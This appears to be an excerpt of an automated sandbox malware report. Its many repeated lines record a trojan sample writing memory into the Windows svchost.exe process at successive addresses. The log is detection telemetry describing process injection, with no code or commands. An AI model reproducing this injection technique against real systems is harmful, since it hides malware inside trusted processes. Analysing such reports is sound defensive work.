    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0030Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0031Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0032Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0033Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0034Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0035Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0036Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0037Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0038Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0039Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F003AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F003BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F003CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F003DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F003EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F003FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0040Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0041Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0042Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0043Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0044Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0045Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0046Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0047Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0048Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0049Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F004AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F004BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F004CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F004DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F004EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F004FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0050Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0051Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0052Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0053Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0054Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0055Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0056Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0057Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0058Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0059Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F005AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F005BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F005CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F005DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F005EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F005FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0060Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0061Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0062Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0063Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208579F0064Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990001Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990002Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990003Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990004Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990005Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990006Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990007Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990008Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990009Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999000AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999000BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999000CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999000DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999000EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999000FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990010Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990011Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990012Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990013Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990014Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990015Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990016Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990017Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990018Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990019Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999001AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999001BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999001CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999001DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999001EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999001FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990020Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990021Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990022Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990023Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990024Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990025Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990026Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990027Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990028Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990029Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999002AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999002BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999002CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999002DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999002EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 2085999002FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990030Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990031Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990032Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990033Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990034Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990035Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990036Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990037Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990038Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599A0000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599A0001Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599A0002Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599A0003Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599A0004Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599A0005Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599A0006Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0000Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0001Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0002Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0003Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0004Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0005Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0006Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0007Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0008Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0009Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B000AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B000BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B000CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B000DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B000EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B000FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0010Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0011Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0012Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0013Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0014Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0015Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0016Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0017Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0018Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0019Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B001AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B001BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B001CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B001DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B001EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B001FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0020Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0021Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0022Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0023Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0024Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0025Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0026Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0027Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0028Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0029Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B002AJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B002BJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B002CJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B002DJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B002EJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B002FJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0030Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0031Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0032Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0033Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0034Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0035Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0036Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0037Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0038Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.8130.1270.16417.exeMemory written: C:\Windows\System32\svchost.exe base: 208599B0039Jump to behavior
